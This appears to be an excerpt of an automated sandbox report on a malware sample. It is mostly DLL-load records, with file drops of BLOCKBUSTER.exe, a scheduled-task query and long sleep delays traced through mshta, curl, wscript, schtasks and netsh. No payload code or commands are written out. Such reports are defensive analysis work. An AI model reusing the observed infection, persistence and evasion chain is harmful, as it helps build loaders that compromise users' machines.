    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: zipfldr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.fileexplorer.common.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: shdocvw.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositorycore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: linkinfo.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntshrui.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cscapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: apphelp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: version.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: mpr.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wininet.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wsock32.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: winmm.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: uxtheme.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: devobj.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: msasn1.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: c_is2022.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: c_g18030.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: c_gsm7.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: c_iscii.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: netapi32.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: netutils.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: olepro32.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: msimg32.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: kernel.appcore.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: windows.storage.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wldp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: unrar.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: 7zxa.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: winhttp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: shfolder.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: magnification.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: urlmon.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: iphlpapi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: iertutil.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: srvcli.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wtsapi32.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: d3d9.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: dwmapi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: security.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: secur32.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: sspicli.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: winsta.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wkscli.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: cscapi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: oleacc.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: textshaping.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: fwpuclnt.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: idndl.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: mlang.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: propsys.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: profapi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: edputil.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: textinputframework.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: coreuicomponents.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: coremessaging.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: ntmarta.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: coremessaging.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wintypes.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wintypes.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wintypes.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: appresolver.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: bcp47langs.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: slc.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: userenv.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: sppc.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wbemcomn.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: sxs.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: napinsp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: pnrpnsp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: wshbth.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: nlaapi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: mswsock.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: dnsapi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: winrnr.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: rasadhlp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: amsi.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: d3d10warp.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: resourcepolicyclient.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: dxcore.dll
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeSection loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\_6720c012c774c\BLOCKBUSTER.exeJump to dropped file
    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\_6720c012c774c\7zxa.dllJump to dropped file
    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\_6720c012c774c\unrar.dllJump to dropped file

    Boot Survival

    barindex
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWindow / User API: threadDelayed 8063
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep count: 8063 > 30
    Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432Thread sleep time: -9675600000s >= -30000s
    Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformation
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess information queried: ProcessInformation
